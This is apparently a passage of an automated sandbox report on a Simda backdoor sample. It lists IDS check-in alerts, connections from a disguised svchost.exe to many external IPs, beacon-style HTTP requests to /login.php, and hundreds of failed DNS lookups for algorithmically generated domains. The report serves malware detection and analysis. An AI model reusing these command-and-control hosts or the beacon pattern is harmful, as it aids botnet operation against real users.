Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.10:54457
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49739 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49761 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49740 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64056 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62051 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62049 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64058 -> 188.114.97.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62050 -> 188.114.96.3:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.202 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 99.83.170.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vocypyt.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pujycyp.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Queries Google from non browser process on port 80
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731345917.6190825
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731345917.8924867
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: HTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Tries to resolve many domain names, but no domain seems valid
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
